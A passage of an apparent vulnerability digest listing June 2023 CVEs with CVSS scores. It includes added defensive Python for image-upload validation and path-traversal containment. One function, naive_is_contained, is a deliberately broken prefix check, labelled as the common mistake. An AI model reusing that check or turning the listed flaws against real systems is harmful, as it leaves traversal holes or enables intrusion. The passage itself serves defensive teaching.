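# server-chosen storage name all agree. The allow-list and sample
# bytes are constructed for the demo.
import os
import secrets

# magic prefix -> canonical extension
SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
ALIASES = {"jpeg": "jpg"}
MAX_BYTES = 5 * 1024 * 1024


def sniff_image_type(data: bytes):
    for magic, ext in SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None


def validate_upload(filename: str, data: bytes):
    """Return (True, stored_name) or (False, reason). The stored name is
    random and carries only the sniffed extension, so 'shell.php.png' or
    a trailing-dot trick cannot choose the name on disk."""
    if len(data) > MAX_BYTES:
        return False, "too large"
    kind = sniff_image_type(data)
    if kind is None:
        return False, "not a recognised image format"
    claimed = os.path.splitext(os.path.basename(filename))[1].lower().lstrip(".")
    claimed = ALIASES.get(claimed, claimed)
    if claimed != kind:
        return False, f"extension {claimed!r} does not match content {kind!r}"
    # heuristic only: a valid image with a PHP payload appended is still an
    # image; the real defence is storing uploads where nothing executes
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded script detected"
    return True, f"{secrets.token_hex(16)}.{kind}"
```

The script-tag scan is a belt-and-braces check, not the control: a polyglot that is both a valid image and a valid script only matters if the upload directory is served by an interpreter, so the directory, not the filter, is the thing to get right.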
2023-06-19 CVE-2023-2719 Supportcandy Unspecified vulnerability in Supportcandy

The SupportCandy WordPress plugin before 3.1.7 does not properly sanitise and escape the `id` parameter for an Agent in the REST API before using it in an SQL statement, leading to an SQL Injection exploitable by users with a role as low as Subscriber.

8.8
2023-06-23 CVE-2023-32409 Apple Unspecified vulnerability in Apple products

The issue was addressed with improved bounds checks.

8.6
2023-06-23 CVE-2023-32414 Apple Unspecified vulnerability in Apple Macos 13.0/13.0.1/13.1

The issue was addressed with improved checks.

8.6
2023-06-23 CVE-2023-35927 Nextcloud Unspecified vulnerability in Nextcloud Server

NextCloud Server and NextCloud Enterprise Server provide file storage for Nextcloud, a self-hosted productivity platform.

8.1
2023-06-23 CVE-2023-34465 Xwiki Improper Privilege Management vulnerability in Xwiki

XWiki Platform is a generic wiki platform.

8.1
2023-06-23 CVE-2023-35801 Safe Path Traversal vulnerability in Safe FME Server

A directory traversal vulnerability in Safe Software FME Server before 2022.2.5 allows an attacker to bypass validation when editing a network-based resource connection, resulting in the unauthorized reading and writing of arbitrary files.

8.1
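The FME Server entry above is a directory traversal that bypasses validation on a resource path; the PHP-IMAP, ONLYOFFICE and laravel-s entries in the critical table are the same class. As an added example, and not FME Server's code, the block below shows the prefix check that usually gets this wrong beside a component-wise containment check; the base directory and the inputs are hypothetical and need not exist.

```python
# Added example (not FME Server's code): confining a user-supplied
# resource path to a base directory. Paths below are hypothetical and
# need not exist; os.path.realpath normalises them either way.
import os


def naive_is_contained(base_dir: str, user_path: str) -> bool:
    """The common but broken check: a string-prefix test that '/srv/data2'
    passes against base '/srv/data'."""
    candidate = os.path.realpath(os.path.join(base_dir, user_path))
    return candidate.startswith(os.path.realpath(base_dir))


def resolve_under(base_dir: str, user_path: str) -> str:
    """Return the canonical path for user_path inside base_dir, or raise
    ValueError if it would escape (.., absolute paths, symlinks, NULs)."""
    if "\x00" in user_path:
        raise ValueError("NUL byte in path")
    if os.path.isabs(user_path):
        raise ValueError("absolute paths are not allowed")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    # commonpath compares path components, so '/srv/data2' is not under '/srv/data'
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes base directory: {user_path!r}")
    return candidate


def is_contained(base_dir: str, user_path: str) -> bool:
    try:
        resolve_under(base_dir, user_path)
        return True
    except ValueError:
        return False
```

Because symlinks are resolved at check time, a link swapped in between the check and the open still wins; for writes, open the file first and verify the descriptor's real path, or use a directory descriptor with `openat` semantics.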
2023-06-22 CVE-2023-34923 Topdesk Incorrect Authorization vulnerability in Topdesk 12.10.12

XML Signature Wrapping (XSW) in the SAML-based single sign-on feature of TOPdesk v12.10.12 allows bad actors with credentials to authenticate with the Identity Provider (IdP) to impersonate any TOPdesk user via SAML Response manipulation.

8.1
2023-06-22 CVE-2023-3256 Advantech Externally Controlled Reference to a Resource in Another Sphere vulnerability in Advantech R-Seenet

Advantech R-SeeNet version 2.4.22 allows low-level users to access and load the content of local files.

8.1
2023-06-19 CVE-2022-46850 Easy Media Replace Project Missing Authorization vulnerability in Easy Media Replace Project Easy Media Replace

Auth.

8.1
2023-06-23 CVE-2023-35150 Xwiki Code Injection vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

8.0
2023-06-20 CVE-2020-21366 Njtech Cross-Site Request Forgery (CSRF) vulnerability in Njtech Greencms 2.3

Cross Site Request Forgery vulnerability in GreenCMS v.2.3 allows an attacker to gain privileges via the adduser function of index.php.

8.0
2023-06-25 CVE-2023-36664 Artifex, Debian, Fedoraproject

Artifex Ghostscript through 10.01.2 mishandles permission validation for pipe devices (with the %pipe% prefix or the | pipe character prefix).

7.8
2023-06-23 CVE-2023-27908 Autodesk Uncontrolled Search Path Element vulnerability in Autodesk Installer

A maliciously crafted DLL file can be forced to write beyond allocated boundaries in the Autodesk installer when parsing the DLL files and could lead to a Privilege Escalation vulnerability.

7.8
2023-06-23 CVE-2023-25003 Autodesk Out-of-bounds Write vulnerability in Autodesk products

A maliciously crafted pskernel.dll file in Autodesk AutoCAD 2023 and Maya 2022 may be used to trigger out-of-bounds write / read vulnerabilities.

7.8
2023-06-23 CVE-2023-23516 Apple Unspecified vulnerability in Apple Macos

The issue was addressed with improved memory handling.

7.8
2023-06-23 CVE-2023-23539 Apple Classic Buffer Overflow vulnerability in Apple Macos 13.0/13.0.1/13.1

A buffer overflow issue was addressed with improved memory handling.

7.8
2023-06-23 CVE-2023-27930 Apple Type Confusion vulnerability in Apple products

A type confusion issue was addressed with improved checks.

7.8
2023-06-23 CVE-2023-32351 Apple Unspecified vulnerability in Apple Itunes

A logic issue was addressed with improved checks.

7.8
2023-06-23 CVE-2023-32353 Apple Unspecified vulnerability in Apple Itunes

A logic issue was addressed with improved checks.

7.8
2023-06-23 CVE-2023-32380 Apple Out-of-bounds Write vulnerability in Apple Macos

An out-of-bounds write issue was addressed with improved bounds checking.

7.8
2023-06-23 CVE-2023-32384 Apple Classic Buffer Overflow vulnerability in Apple products

A buffer overflow was addressed with improved bounds checking.

7.8
2023-06-23 CVE-2023-32398 Apple Use After Free vulnerability in Apple products

A use-after-free issue was addressed with improved memory management.

7.8
2023-06-23 CVE-2023-32405 Apple Unspecified vulnerability in Apple Macos

A logic issue was addressed with improved checks.

7.8
2023-06-23 CVE-2023-32434 Apple Integer Overflow or Wraparound vulnerability in Apple products

An integer overflow was addressed with improved input validation.

7.8
2023-06-23 CVE-2023-3302 Admidio Improper Neutralization of Formula Elements in a CSV File vulnerability in Admidio

Improper Neutralization of Formula Elements in a CSV File in GitHub repository admidio/admidio prior to 4.2.9.

7.8
2023-06-23 CVE-2023-28073 Dell Improper Authentication vulnerability in Dell Latitude 5530 Firmware and Precision 3570 Firmware

Dell BIOS contains an improper authentication vulnerability.

7.8
2023-06-23 CVE-2023-36192 Irontec Out-of-bounds Write vulnerability in Irontec Sngrep 1.6.0

Sngrep v1.6.0 was discovered to contain a heap buffer overflow via the function capture_ws_check_packet at /src/capture.c.

7.8
2023-06-23 CVE-2023-36193 Lcdf Out-of-bounds Write vulnerability in Lcdf Gifsicle 1.93

Gifsicle v1.9.3 was discovered to contain a heap buffer overflow via the ambiguity_error component at /src/clp.c.

7.8
2023-06-22 CVE-2023-28006 Hcltech Use of a Broken or Risky Cryptographic Algorithm vulnerability in Hcltech Bigfix OSD Bare Metal Server

The OSD Bare Metal Server uses a cryptographic algorithm that is no longer considered sufficiently secure.

7.8
2023-06-22 CVE-2023-36243 Flvmeta Classic Buffer Overflow vulnerability in Flvmeta 1.2.1

FLVMeta v1.2.1 was discovered to contain a buffer overflow via the xml_on_metadata_tag_only function at dump_xml.c.

7.8
2023-06-22 CVE-2023-32449 Dell Improper Verification of Cryptographic Signature vulnerability in Dell Powerstoret OS

Dell PowerStore versions prior to 3.5 contain an improper verification of cryptographic signature vulnerability.

7.8
2023-06-22 CVE-2023-28956 IBM Unspecified vulnerability in IBM Spectrum Protect Backup-Archive Client

IBM Spectrum Protect Backup-Archive Client 8.1.0.0 through 8.1.17.2 may allow a local user to escalate their privileges due to improper access controls.

7.8
2023-06-19 CVE-2023-30759 Ricoh Insufficient Verification of Data Authenticity vulnerability in Ricoh Printer Driver Packager NX

The driver installation package created by Printer Driver Packager NX v1.0.02 to v1.1.25 fails to detect its modification and may spawn an unexpected process with the administrative privilege.

7.8
2023-06-19 CVE-2023-31239 Fujielectric Out-of-bounds Read vulnerability in Fujielectric V-Server 4.0.15.0

Stack-based buffer overflow vulnerability in V-Server v4.0.15.0 and V-Server Lite v4.0.15.0 and earlier allows an attacker to execute arbitrary code by having user open a specially crafted VPR file.

7.8
2023-06-19 CVE-2023-32201 Fujielectric Out-of-bounds Write vulnerability in Fujielectric Tellus and Tellus Lite

Stack-based buffer overflow vulnerability exists in TELLUS v4.0.15.0 and TELLUS Lite v4.0.15.0.

7.8
2023-06-19 CVE-2023-32270 Fujielectric Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Fujielectric Tellus and Tellus Lite

Access of memory location after end of buffer issue exists in TELLUS v4.0.15.0 and TELLUS Lite v4.0.15.0.

7.8
2023-06-19 CVE-2023-32273 Fujielectric Out-of-bounds Write vulnerability in Fujielectric Tellus and Tellus Lite

Stack-based buffer overflow vulnerability exists in TELLUS v4.0.15.0 and TELLUS Lite v4.0.15.0.

7.8
2023-06-19 CVE-2023-32276 Fujielectric Out-of-bounds Write vulnerability in Fujielectric Tellus and Tellus Lite

Stack-based buffer overflow vulnerability exists in TELLUS v4.0.15.0 and TELLUS Lite v4.0.15.0.

7.8
2023-06-19 CVE-2023-32288 Fujielectric Out-of-bounds Read vulnerability in Fujielectric Tellus and Tellus Lite

Out-of-bounds read vulnerability exists in TELLUS v4.0.15.0 and TELLUS Lite v4.0.15.0.

7.8
2023-06-19 CVE-2023-32538 Fujielectric Out-of-bounds Write vulnerability in Fujielectric Tellus and Tellus Lite

Stack-based buffer overflow vulnerability exists in TELLUS v4.0.15.0 and TELLUS Lite v4.0.15.0.

7.8
2023-06-19 CVE-2023-32542 Fujielectric Out-of-bounds Read vulnerability in Fujielectric Tellus and Tellus Lite

Out-of-bounds read vulnerability exists in TELLUS v4.0.15.0 and TELLUS Lite v4.0.15.0.

7.8
2023-06-19 CVE-2023-34641 Kioware Unspecified vulnerability in Kioware

KioWare for Windows through v8.33 was discovered to contain an incomplete blacklist filter for blocked dialog boxes on Windows 10.

7.8
2023-06-19 CVE-2023-34642 Kioware Unspecified vulnerability in Kioware

KioWare for Windows through v8.33 was discovered to contain an incomplete blacklist filter for blocked dialog boxes on Windows 10.

7.8
2023-06-22 CVE-2023-3114 Hashicorp Incorrect Authorization vulnerability in Hashicorp Terraform Enterprise

Terraform Enterprise since v202207-1 did not properly implement authorization rules for agent pools, allowing the workspace to be targeted by unauthorized agents.

7.7
2023-06-22 CVE-2023-36356 TP Link Out-of-bounds Read vulnerability in Tp-Link products

TP-Link TL-WR940N V2/V4/V6, TL-WR841N V8, TL-WR941ND V5, and TL-WR740N V1/V2 were discovered to contain a buffer read out-of-bounds via the component /userRpm/VirtualServerRpm.

7.7
2023-06-22 CVE-2023-36357 TP Link Unspecified vulnerability in Tp-Link products

An issue in the /userRpm/LocalManageControlRpm component of TP-Link TL-WR940N V2/V4/V6, TL-WR841N V8/V10, and TL-WR941ND V5 allows attackers to cause a Denial of Service (DoS) via a crafted GET request.

7.7
2023-06-22 CVE-2023-36358 TP Link Classic Buffer Overflow vulnerability in Tp-Link products

TP-Link TL-WR940N V2/V3/V4, TL-WR941ND V5/V6, TL-WR743ND V1 and TL-WR841N V8 were discovered to contain a buffer overflow in the component /userRpm/AccessCtrlAccessTargetsRpm.

7.7
2023-06-23 CVE-2023-1783 Orangescrum Cross-site Scripting vulnerability in Orangescrum 2.0.11

OrangeScrum version 2.0.11 allows an external attacker to remotely obtain AWS instance credentials.

7.6
2023-06-23 CVE-2023-25515 Nvidia Unspecified vulnerability in Nvidia GPU Display Driver and Virtual GPU

NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability where unexpected untrusted data is parsed, which may lead to code execution, denial of service, escalation of privileges, data tampering, or information disclosure.

7.6
2023-06-25 CVE-2023-36661 Shibboleth, Debian Server-Side Request Forgery (SSRF) vulnerability in multiple products

Shibboleth XMLTooling before 3.2.4, as used in OpenSAML and Shibboleth Service Provider, allows SSRF via a crafted KeyInfo element.

7.5
2023-06-25 CVE-2023-36632 Python Uncontrolled Recursion vulnerability in Python

The legacy email.utils.parseaddr function in Python through 3.11.4 allows attackers to trigger "RecursionError: maximum recursion depth exceeded while calling a Python object" via a crafted argument.

7.5
2023-06-25 CVE-2023-36612 Basecamp Path Traversal vulnerability in Basecamp

Directory traversal can occur in the Basecamp com.basecamp.bc3 application before 4.2.1 for Android, which may allow an attacker to write arbitrary files in the application's private directory.

7.5
2023-06-23 CVE-2023-34188 Cesanta Unspecified vulnerability in Cesanta Mongoose

The HTTP server in Mongoose before 7.10 accepts requests containing negative Content-Length headers.

7.5
2023-06-23 CVE-2023-32397 Apple Unspecified vulnerability in Apple Ipados and Macos

A logic issue was addressed with improved state management.

7.5
2023-06-23 CVE-2023-34467 Xwiki Exposure of Resource to Wrong Sphere vulnerability in Xwiki

XWiki Platform is a generic wiki platform.

7.5
2023-06-23 CVE-2023-35151 Xwiki Exposure of Resource to Wrong Sphere vulnerability in Xwiki

XWiki Platform is a generic wiki platform.

7.5
2023-06-23 CVE-2023-36284 Webkul SQL Injection vulnerability in Webkul Qloapps 1.6.0

An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameter date_from, date_to, and id_product allows a remote attacker to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database.

7.5
2023-06-23 CVE-2022-47614 Inspireui SQL Injection vulnerability in Inspireui Mstore API

Unauth.

7.5
2023-06-23 CVE-2023-29860 Dtstack Incorrect Permission Assignment for Critical Resource vulnerability in Dtstack Taier 1.3.0

An insecure permissions in /Taier/API/tenant/listTenant interface in DTStack Taier 1.3.0 allows attackers to view sensitive information via the getCookie method.

7.5
2023-06-23 CVE-2023-30362 Libcoap Out-of-bounds Read vulnerability in Libcoap

Buffer Overflow vulnerability in coap_send function in libcoap library 4.3.1-103-g52cfd56 fixed in 4.3.1-120-ge242200 allows attackers to obtain sensitive information via malformed pdu.

7.5
2023-06-23 CVE-2023-32463 Dell Unspecified vulnerability in Dell products

Dell VxRail, version(s) 8.0.100 and earlier contain a denial-of-service vulnerability in the upgrade functionality.

7.5
2023-06-23 CVE-2023-33141 Microsoft Unspecified vulnerability in Microsoft YET Another Reverse Proxy

Yet Another Reverse Proxy (YARP) Denial of Service Vulnerability

7.5
2023-06-22 CVE-2023-32320 Nextcloud Improper Restriction of Excessive Authentication Attempts vulnerability in Nextcloud Server

Nextcloud Server is a data storage system for Nextcloud, a self-hosted productivity platform.

7.5
2023-06-22 CVE-2023-35133 Moodle Server-Side Request Forgery (SSRF) vulnerability in Moodle

An issue in the logic used to check 0.0.0.0 against the cURL blocked hosts lists resulted in an SSRF risk.

7.5
2023-06-22 CVE-2023-2990 Globalscape Uncontrolled Recursion vulnerability in Globalscape EFT Server 6.2.31.2

Fortra Globalscape EFT versions before 8.1.0.16 suffer from a denial of service vulnerability, where a compressed message that decompresses to itself can cause infinite recursion and crash the service.

7.5
2023-06-22 CVE-2023-36354 TP Link Classic Buffer Overflow vulnerability in Tp-Link products

TP-Link TL-WR940N V4, TL-WR841N V8/V10, TL-WR740N V1/V2, TL-WR940N V2/V3, and TL-WR941ND V5/V6 were discovered to contain a buffer overflow in the component /userRpm/AccessCtrlTimeSchedRpm.

7.5
2023-06-22 CVE-2023-36359 TP Link Classic Buffer Overflow vulnerability in Tp-Link products

TP-Link TL-WR940N V4, TL-WR841N V8/V10, TL-WR940N V2/V3 and TL-WR941ND V5/V6 were discovered to contain a buffer overflow in the component /userRpm/QoSRuleListRpm.

7.5
2023-06-22 CVE-2023-36362 Monetdb Unspecified vulnerability in Monetdb 11.45.17/11.46.0

An issue in the rel_sequences component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

7.5
2023-06-22 CVE-2023-36363 Monetdb Unspecified vulnerability in Monetdb 11.45.17/11.46.0

An issue in the __nss_database_lookup component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

7.5
2023-06-22 CVE-2023-36364 Monetdb Unspecified vulnerability in Monetdb 11.45.17/11.46.0

An issue in the rel_deps component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

7.5
2023-06-22 CVE-2023-36365 Monetdb Unspecified vulnerability in Monetdb 11.45.17/11.46.0

An issue in the sql_trans_copy_key component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

7.5
2023-06-22 CVE-2023-36366 Monetdb Unspecified vulnerability in Monetdb 11.45.17/11.46.0

An issue in the log_create_delta component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause Denial of Service (DoS) via crafted SQL statements.

7.5
2023-06-22 CVE-2023-36367 Monetdb Unspecified vulnerability in Monetdb 11.45.17/11.46.0

An issue in the BLOBcmp component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

7.5
2023-06-22 CVE-2023-36368 Monetdb Unspecified vulnerability in Monetdb 11.45.17/11.46.0

An issue in the cs_bind_ubat component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

7.5
2023-06-22 CVE-2023-36369 Monetdb Unspecified vulnerability in Monetdb 11.45.17/11.46.0

An issue in the list_append component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

7.5
2023-06-22 CVE-2023-36370 Monetdb Unspecified vulnerability in Monetdb 11.45.17/11.46.0

An issue in the gc_col component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

7.5
2023-06-22 CVE-2023-36371 Monetdb Unspecified vulnerability in Monetdb 11.45.17/11.46.0

An issue in the GDKfree component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

7.5
2023-06-22 CVE-2023-20896 Vmware Out-of-bounds Read vulnerability in VMWare Vcenter Server

The VMware vCenter Server contains an out-of-bounds read vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger an out-of-bounds read by sending a specially crafted packet leading to denial-of-service of certain services (vmcad, vmdird, and vmafdd).

7.5
2023-06-22 CVE-2023-29708 Wavlink Unspecified vulnerability in Wavlink Wavrouter APP Rpt70Ha1.X

An issue was discovered in /cgi-bin/adm.cgi in WavLink WavRouter version RPT70HA1.x, allows attackers to force a factory reset via crafted payload.

7.5
2023-06-22 CVE-2023-29709 Wildix Unspecified vulnerability in Wildix Wsg24Poe Firmware 103Sp7D190822

An issue was discovered in /cgi-bin/login_rj.cgi in Wildix WSG24POE version 103SP7D190822, allows attackers to bypass authentication.

7.5
2023-06-22 CVE-2023-26115 Word Wrap Project Unspecified vulnerability in Word-Wrap Project Word-Wrap

All versions of the package word-wrap are vulnerable to Regular Expression Denial of Service (ReDoS) due to the usage of an insecure regular expression within the result variable.

7.5
2023-06-21 CVE-2023-33289 Urlnorm Project Unspecified vulnerability in Urlnorm Project Urlnorm

The urlnorm crate through 0.1.4 for Rust allows Regular Expression Denial of Service (ReDos) via a crafted URL to lib.rs.

7.5
2023-06-21 CVE-2023-0026 Juniper Improper Input Validation vulnerability in Juniper Junos

An Improper Input Validation vulnerability in the Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS).

7.5
2023-06-21 CVE-2023-2828 ISC, Debian, Fedoraproject, Netapp Allocation of Resources Without Limits or Throttling vulnerability in multiple products

Every `named` instance configured to run as a recursive resolver maintains a cache database holding the responses to the queries it has recently sent to authoritative servers.

7.5
2023-06-21 CVE-2023-2829 ISC, Netapp

A `named` instance configured to run as a DNSSEC-validating recursive resolver with the Aggressive Use of DNSSEC-Validated Cache (RFC 8198) option (`synth-from-dnssec`) enabled can be remotely terminated using a zone with a malformed NSEC record. This issue affects BIND 9 versions 9.16.8-S1 through 9.16.41-S1 and 9.18.11-S1 through 9.18.15-S1.

7.5
2023-06-21 CVE-2023-2911 ISC, Debian, Fedoraproject, Netapp Out-of-bounds Write vulnerability in multiple products

If the `recursive-clients` quota is reached on a BIND 9 resolver configured with both `stale-answer-enable yes;` and `stale-answer-client-timeout 0;`, a sequence of serve-stale-related lookups could cause `named` to loop and terminate unexpectedly due to a stack overflow. This issue affects BIND 9 versions 9.16.33 through 9.16.41, 9.18.7 through 9.18.15, 9.16.33-S1 through 9.16.41-S1, and 9.18.11-S1 through 9.18.15-S1.

7.5
2023-06-21 CVE-2023-27243 Makves Cleartext Storage of Sensitive Information vulnerability in Makves Dcap 3.0.0.122/3.0.0.183

An access control issue in Makves DCAP v3.0.0.122 allows unauthenticated attackers to obtain cleartext credentials via a crafted web request to the product API.

7.5
2023-06-21 CVE-2023-34981 Apache Unspecified vulnerability in Apache Tomcat

A regression in the fix for bug 66512 in Apache Tomcat 11.0.0-M5, 10.1.8, 9.0.74 and 8.5.88 meant that, if a response did not include any HTTP headers, no AJP SEND_HEADERS message would be sent for the response, which in turn meant that at least one AJP proxy (mod_proxy_ajp) would use the response headers from the previous request, leading to an information leak.

7.5
2023-06-21 CVE-2023-3339 Agro School Management System Project SQL Injection vulnerability in Agro-School Management System Project Agro-School Management System 1.0

A vulnerability has been found in code-projects Agro-School Management System 1.0 and classified as critical.

7.5
2023-06-21 CVE-2022-25883 Npmjs Unspecified vulnerability in Npmjs Semver

Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.

7.5
2023-06-20 CVE-2023-32274 Enphase Use of Hard-coded Credentials vulnerability in Enphase Installer Toolkit 3.27.0

Enphase Installer Toolkit versions 3.27.0 has hard coded credentials embedded in binary code in the Android application.

7.5
2023-06-20 CVE-2020-20335 Kilo Project Integer Overflow or Wraparound vulnerability in Kilo Project Kilo 0.0.1

Buffer Overflow vulnerability in Antirez Kilo before commit 7709a04ae8520c5b04d261616098cebf742f5a23 allows a remote attacker to cause a denial of service via the editorUpdateRow function in kilo.c.

7.5
2023-06-20 CVE-2020-20636 Joyplus CMS Project SQL Injection vulnerability in Joyplus-Cms Project Joyplus-Cms 1.6.0

SQL injection vulnerability found in Joyplus-cms v.1.6.0 allows a remote attacker to access sensitive information via the id parameter of the goodbad() function.

7.5
2023-06-20 CVE-2020-21486 Phpok SQL Injection vulnerability in PHPok 5.4

SQL injection vulnerability in PHPOK v.5.4.

7.5
2023-06-20 CVE-2023-1999 Webmproject Use After Free vulnerability in Webmproject Libwebp

There exists a use after free/double free in libwebp.

7.5
2023-06-19 CVE-2023-35843 Nocodb Path Traversal vulnerability in Nocodb

NocoDB through 0.106.0 (or 0.109.1) has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route.

7.5
2023-06-19 CVE-2023-3312 Linux Double Free vulnerability in Linux Kernel

A vulnerability was found in drivers/cpufreq/qcom-cpufreq-hw.c in cpufreq subsystem in the Linux Kernel.

7.5
2023-06-19 CVE-2022-48486 Huawei Unspecified vulnerability in Huawei Emui 12.0.0

Configuration defects in the secure OS module. Successful exploitation of this vulnerability will affect availability.

7.5
2023-06-19 CVE-2022-48487 Huawei Unspecified vulnerability in Huawei Emui 12.0.0

Configuration defects in the secure OS module. Successful exploitation of this vulnerability will affect availability.

7.5
2023-06-19 CVE-2022-48489 Huawei Unspecified vulnerability in Huawei Emui 12.0.0

Configuration defects in the secure OS module. Successful exploitation of this vulnerability will affect availability.

7.5
2023-06-19 CVE-2022-48490 Huawei Unspecified vulnerability in Huawei Emui 12.0.0

Configuration defects in the secure OS module. Successful exploitation of this vulnerability will affect availability.

7.5
2023-06-19 CVE-2022-48492 Huawei Unspecified vulnerability in Huawei Emui 12.0.0

Configuration defects in the secure OS module. Successful exploitation of this vulnerability will affect availability.

7.5
2023-06-19 CVE-2022-48493 Huawei Unspecified vulnerability in Huawei Emui 12.0.0

Configuration defects in the secure OS module. Successful exploitation of this vulnerability will affect availability.

7.5
2023-06-19 CVE-2022-48494 Huawei Improper Authentication vulnerability in Huawei Emui

Vulnerability of lax app identity verification in the pre-authorization function. Successful exploitation of this vulnerability will cause malicious apps to become pre-authorized.

7.5
2023-06-19 CVE-2022-48496 Huawei Improper Authentication vulnerability in Huawei Emui

Vulnerability of lax app identity verification in the pre-authorization function. Successful exploitation of this vulnerability will cause malicious apps to become pre-authorized.

7.5
2023-06-19 CVE-2022-48497 Huawei Unspecified vulnerability in Huawei Emui 12.0.0

Configuration defects in the secure OS module. Successful exploitation of this vulnerability will affect availability.

7.5
2023-06-19 CVE-2022-48498 Huawei Unspecified vulnerability in Huawei Emui 12.0.0

Configuration defects in the secure OS module. Successful exploitation of this vulnerability will affect availability.

7.5
2023-06-19 CVE-2022-48499 Huawei Unspecified vulnerability in Huawei Emui 12.0.0

Configuration defects in the secure OS module. Successful exploitation of this vulnerability will affect availability.

7.5
2023-06-19 CVE-2022-48500 Huawei Unspecified vulnerability in Huawei Emui 12.0.0

Configuration defects in the secure OS module. Successful exploitation of this vulnerability will affect availability.

7.5
2023-06-19 CVE-2022-48501 Huawei Unspecified vulnerability in Huawei Emui 12.0.0

Configuration defects in the secure OS module. Successful exploitation of this vulnerability will affect availability.

7.5
2023-06-19 CVE-2023-34155 Huawei Unspecified vulnerability in Huawei Emui 13.0.0

Vulnerability of unauthorized calling on HUAWEI phones and tablets. Successful exploitation of this vulnerability may affect availability.

7.5
2023-06-19 CVE-2023-34161 Huawei Incorrect Authorization vulnerability in Huawei Emui

Inappropriate authorization vulnerability in the SettingsProvider module. Successful exploitation of this vulnerability may cause features to perform abnormally.

7.5
2023-06-19 CVE-2023-34162 Huawei Unspecified vulnerability in Huawei Emui 13.0.0

Version update determination vulnerability in the user profile module. Successful exploitation of this vulnerability may cause repeated HMS Core updates and cause services to fail.

7.5
2023-06-19 CVE-2023-34163 Huawei Unspecified vulnerability in Huawei Emui

Permission control vulnerability in the window management module. Successful exploitation of this vulnerability may cause features to perform abnormally.

7.5
2023-06-19 CVE-2023-34166 Huawei Resource Exhaustion vulnerability in Huawei Emui

Vulnerability of system restart triggered by abnormal callbacks passed to APIs. Successful exploitation of this vulnerability may cause the system to restart.

7.5
2023-06-19 CVE-2023-25733 Mozilla Unchecked Return Value vulnerability in Mozilla Firefox

The return value from `gfx::SourceSurfaceSkia::Map()` wasn't being verified, which could have potentially led to a null pointer dereference.

7.5
2023-06-19 CVE-2023-25747 Mozilla Use After Free vulnerability in Mozilla Firefox

A potential use-after-free in libaudio was fixed by disabling the AAudio backend when running on Android API below version 30. This bug only affects Firefox for Android.

7.5
2023-06-19 CVE-2023-32209 Mozilla Out-of-bounds Write vulnerability in Mozilla Firefox

A maliciously crafted favicon could have led to an out of memory crash.

7.5
2023-06-19 CVE-2023-32214 Mozilla Unspecified vulnerability in Mozilla Firefox

Protocol handlers `ms-cxh` and `ms-cxh-full` could have been leveraged to trigger a denial of service. Note: This attack only affects Windows.

7.5
2023-06-19 CVE-2023-34602 Jeecg SQL Injection vulnerability in Jeecg Jeecgboot

JeecgBoot up to v 3.5.1 was discovered to contain a SQL injection vulnerability via the component queryTableDictItemsByCode at org.jeecg.modules.api.controller.SystemApiController.

7.5
2023-06-19 CVE-2023-34603 Jeecg SQL Injection vulnerability in Jeecg Jeecgboot

JeecgBoot up to v 3.5.1 was discovered to contain a SQL injection vulnerability via the component queryFilterTableDictInfo at org.jeecg.modules.api.controller.SystemApiController.

7.5
2023-06-19 CVE-2023-35852 Oisf Path Traversal vulnerability in Oisf Suricata

In Suricata before 6.0.13 (when there is an adversary who controls an external source of rules), a dataset filename, that comes from a rule, may trigger absolute or relative directory traversal, and lead to write access to a local filesystem.

7.5
2023-06-19 CVE-2023-35846 Virtualsquare Unspecified vulnerability in Virtualsquare Picotcp

VirtualSquare picoTCP (aka PicoTCP-NG) through 2.1 does not check the transport layer length in a frame before performing port filtering.

7.5
2023-06-19 CVE-2023-35847 Virtualsquare Use of Uninitialized Resource vulnerability in Virtualsquare Picotcp

VirtualSquare picoTCP (aka PicoTCP-NG) through 2.1 does not have an MSS lower bound (e.g., it could be zero).

7.5
2023-06-19 CVE-2023-35848 Virtualsquare Incorrect Calculation vulnerability in Virtualsquare Picotcp

VirtualSquare picoTCP (aka PicoTCP-NG) through 2.1 lacks certain size calculations before attempting to set a value of an mss structure member.

7.5
2023-06-19 CVE-2023-35849 Virtualsquare Improper Check for Unusual or Exceptional Conditions vulnerability in Virtualsquare Picotcp

VirtualSquare picoTCP (aka PicoTCP-NG) through 2.1 does not properly check whether header sizes would result in accessing data outside of a packet.

7.5
2023-06-19 CVE-2023-35844 Lightdash Path Traversal vulnerability in Lightdash

packages/backend/src/routers in Lightdash before 0.510.3 has insecure file endpoints, e.g., they allow ..

7.5
2023-06-19 CVE-2023-31410 Sick Cleartext Transmission of Sensitive Information vulnerability in Sick Eventcam APP

